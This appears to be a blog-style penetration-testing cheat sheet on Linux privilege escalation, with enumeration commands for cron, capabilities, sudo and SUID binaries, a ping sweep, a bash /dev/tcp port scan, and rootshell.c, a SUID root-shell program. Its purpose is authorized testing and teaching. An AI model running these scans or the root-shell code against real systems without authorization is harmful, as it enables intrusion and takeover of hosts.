Posted Sep 22, 2019 2019-09-22T00:00:00+01:00 by mlcsec
Updated Dec 5, 2020 2020-12-05T12:09:34+00:00

A small collection of Linux privilege-escalation enumeration scripts, references and commands, for use on systems you are authorized to test. The commands below are read-only enumeration unless noted otherwise (crontab -e, the sweeps and rootshell.c change state or make noise).
Scripts
LinEnum.sh
Private-i.sh
LinPeas.sh
pspy
LinuxPrivChecker.py
Linux-Exploit-Suggester.sh
References
GTFOBins
Linux - Privilege Escalation
Basic Linux Privilege Escalation
General
OS
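# OS / kernel identification. Distribution, release and exact kernel build —
# the kernel string is what Linux-Exploit-Suggester needs, so record it verbatim.
cat /etc/issue
cat /etc/*-release            # /etc/os-release is the standardized one; the rest are distro-specific
cat /proc/version             # kernel version plus the compiler used to build it
uname -a                      # kernel release, build date and architecture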
Files
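# File-system enumeration. Every find below sends stderr to /dev/null: as a
# low-privileged user most of / is "Permission denied" noise otherwise.
# Fill the placeholders before running, e.g.:
#   user=alice group=staff name=id_rsa ext=conf targetdir=/opt/app keyword=password
find / -readable 2>/dev/null                          # everything this account can read
find / -user "$user" 2>/dev/null                      # files owned by $user
find / -group "$group" 2>/dev/null                    # files owned by group $group
find / -name "$name" 2>/dev/null                      # exact file name
find / -type f -name "*.conf" 2>/dev/null             # all .conf files
find /etc -type f -name "*.conf" 2>/dev/null          # .conf files under /etc only
# files modified inside a date window (-newermt is GNU find; dates like 2019-09-01)
find / -newermt "$start" ! -newermt "$end" 2>/dev/null
# dump every file with extension $ext under $targetdir, then grep the dump.
# NOTE: out.txt is an artifact you leave on the target — write it somewhere you
# will clean up (mktemp -d) and delete it when done.
find "$targetdir" -name "*.$ext" -exec cat {} + > out.txt 2>/dev/null
grep -- "$keyword" out.txt
# world-writable regular files — not only "startup scripts": anything root reads
# or executes (configs, cron targets, service units) that "other" can write to.
find / -perm -o+w -type f 2>/dev/null | grep -v '/proc\|/dev'
find / -writable -type d 2>/dev/null                  # directories this account can write to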
Cronjobs
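# Scheduled jobs. The thing to look for is a job that runs as root and executes
# a script, binary or directory this account can write to (check each path with ls -la).
crontab -l                                     # current user's crontab
cat /etc/crontab                               # system-wide crontab (has a user column)
ls -la /etc/cron*                              # cron.d/ plus cron.hourly/daily/weekly/monthly
ls -la /var/spool/cron/crontabs 2>/dev/null    # per-user crontabs (normally root-only)
cat /etc/anacrontab 2>/dev/null                # anacron jobs, if installed
systemctl list-timers --all 2>/dev/null        # systemd timers replace cron on many distros
crontab -e                                     # EDITS your crontab — only if you mean to persist/test something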
Check capabilities
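# File capabilities on every binary; permission-denied noise goes to /dev/null.
getcap -r / 2>/dev/null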
In setcap syntax `+ep` raises the effective and permitted flags and `-ep` clears them (e.g. `setcap cap_setuid+ep /path/to/bin`; `setcap -r file` removes all capabilities). Each capability in the getcap output carries up to three flags:
• e: Effective — the capability is active in the process after the exec.
• p: Permitted — the capability is allowed; the program may raise it into its effective set.
• i: Inheritable — the capability survives execve(), but only lands in the new program's permitted set if the executed file's inheritable set also contains it.
Hits worth a second look: cap_setuid / cap_setgid (direct uid/gid change), cap_dac_read_search / cap_dac_override (read or write any file), cap_sys_admin and cap_sys_ptrace — above all when set on an interpreter such as python or perl. GTFOBins (referenced above) lists the one-liners for each.
Running processes/services
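# Running processes. Look for services running as root (backup jobs, custom
# daemons, cron workers) and for passwords passed on the command line.
ps aux
ps -ef
ps aux | grep root          # also matches "root" anywhere in a command line (and the grep itself)
ps -ef | grep root
ps -U root -u root u        # real+effective uid root only — no false positives
pgrep -u root -a            # same idea: pid plus full command line
top -b -n 1                 # one batch snapshot; plain top needs an interactive terminal
cat /etc/services           # static port-name table, NOT what is running — see "Listening ports"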
Running daemons
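# Processes with no controlling terminal ("?" in the TTY column) — daemons and
# services. The pattern must be quoted: unquoted ^? is a shell glob.
ps -eo 'tty,pid,comm' | grep '^?'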
Listening ports
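# Listening sockets. Any of the first three tools may be missing on a hardened
# host; tcp_listeners() below needs only awk and /proc and works when they are.
# Services bound to 127.0.0.1 only are the interesting ones: they are reachable
# from here but not from the network, so they were never exposed to testing.
netstat -tulpn 2>/dev/null                  # deprecated but common; -p (owning pid) needs root
lsof -i -P -n 2>/dev/null | grep LISTEN
ss -tulpnw 2>/dev/null                      # tcp, udp, raw, listening, numeric, with pid

#######################################
# Decode /proc/net/tcp directly: addresses are hex in little-endian host
# order, ports are big-endian hex, and state 0A is LISTEN. Only LISTEN rows
# are printed (the original one-liner printed every socket, and read the
# remote-address column). Plain POSIX awk — no gawk strtonum() needed.
# Arguments: $1 - table to read (default /proc/net/tcp; /proc/net/tcp6 is
#                 not decoded correctly — its addresses are 32 hex digits)
# Outputs:   one "ip:port" per listening socket on stdout
#######################################
tcp_listeners() {
  local table=${1:-/proc/net/tcp}
  grep -v "rem_address" "$table" | awk '
    function hex2dec(h,   i, n) {
      h = toupper(h); n = 0
      for (i = 1; i <= length(h); i++)
        n = n * 16 + index("0123456789ABCDEF", substr(h, i, 1)) - 1
      return n
    }
    $4 == "0A" {
      addr = $2                        # local_address column: "0100007F:0035"
      colon = index(addr, ":")
      ip = hex2dec(substr(addr, colon - 2, 2))
      for (i = 5; i > 0; i -= 2)       # remaining octets, least significant first
        ip = ip "." hex2dec(substr(addr, i, 2))
      print ip ":" hex2dec(substr(addr, colon + 1, 4))
    }'
}
tcp_listeners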
Firewall rules
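# Firewall rules. The rules.v4/v6 files are Debian/Ubuntu iptables-persistent
# saves and are usually root-only; the live rule set also needs root (a sudo
# rule for iptables is itself worth noting). Local-only services found in
# "Listening ports" are often what the rules are hiding.
cat /etc/iptables/rules.v4 2>/dev/null
cat /etc/iptables/rules.v6 2>/dev/null
iptables -S 2>/dev/null           # live IPv4 rules (root); ip6tables -S for v6
nft list ruleset 2>/dev/null      # nftables-based hosts
ufw status verbose 2>/dev/null    # Ubuntu front-end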
Sudo configuration
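# sudo rights. sudo -l lists what this account may run as whom; it can prompt
# for the user's password and every invocation is logged (auth.log / journal).
# Entries with NOPASSWD, wildcards, or an editor/interpreter/pager listed in
# GTFOBins are the first things to check.
sudo -l
sudo -n -l 2>/dev/null             # non-interactive: fails instead of hanging on a password prompt
cat /etc/sudoers 2>/dev/null       # normally root-only (0440), but check
ls -la /etc/sudoers.d/ 2>/dev/null && cat /etc/sudoers.d/* 2>/dev/null
sudo --version                     # the version matters for exploit suggesters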
Vulnerable binaries
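# SUID / SGID binaries run with the owner's / group's privileges. Cross-check
# every unfamiliar hit against GTFOBins, and note non-standard paths (/opt, /home).
find / -perm -4000 -type f 2>/dev/null        # SUID (same as -perm -u=s)
find / -perm -2000 -type f 2>/dev/null        # SGID (the original said "GUID")
# both at once, with owner and mode shown; the parentheses keep -o from
# binding only the second test to -type/-exec
find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} + 2>/dev/null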
Ping sweep
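# ICMP sweep of a /24. Set the network first, e.g.: net=10.10.10
# Probes are backgrounded so the sweep takes about a second instead of 254 s;
# -W 1 bounds each one. Jobs are started in this shell (not a subshell) so
# that wait actually waits for them. Hosts that drop ICMP will not answer —
# fall back to the port scan below for those.
for i in {1..254}; do
  ping -c 1 -W 1 "$net.$i" 2>/dev/null | grep "bytes from" &
done
wait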
Port scan
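# TCP connect scan of ports 1-1024 through bash's /dev/tcp — no nc or nmap
# needed. Set the target first, e.g.: ip=10.10.10.5
# timeout bounds each attempt: a filtered port otherwise blocks for the full
# kernel SYN retry period (over a minute), and 1024 of those never finish.
# This is noisy: one full connection per port shows up in the target's logs.
for p in {1..1024}; do
  timeout 1 bash -c "echo >/dev/tcp/$ip/$p" >/dev/null 2>&1 && echo "$p open"
done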
rootshell.c
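/*
 * rootshell.c — spawn a root shell from a root-owned SUID binary (or any
 * other context that already runs with euid 0, e.g. a root cron job).
 * Build: gcc rootshell.c -o rootshell ; then chown root:root + chmod u+s.
 *
 * Why setuid(0) and not just seteuid(0): bash and dash drop privileges when
 * the effective uid differs from the real uid. When the caller's euid is 0,
 * setuid(0) sets the real, effective and saved uids together, so the shell
 * sees uid == euid == 0 and keeps them. The original's seteuid/setegid calls
 * were therefore redundant.
 *
 * The original called execvp("/bin/sh", NULL, NULL): execvp() takes only
 * (file, argv) — the three-argument shape belongs to execve() — and a NULL
 * argv is undefined. execl() spells the argv out explicitly.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    /* Conventional order: change the gid while still root, then the uid.
     * Each call is checked — a silent failure just hands back an
     * unprivileged shell, which is confusing to debug on a target. */
    if (setgid(0) != 0) {
        perror("setgid");
        return EXIT_FAILURE;
    }
    if (setuid(0) != 0) {
        perror("setuid");
        return EXIT_FAILURE;
    }
    execl("/bin/sh", "sh", (char *)NULL);
    perror("execl");            /* only reached if the exec itself failed */
    return EXIT_FAILURE;
}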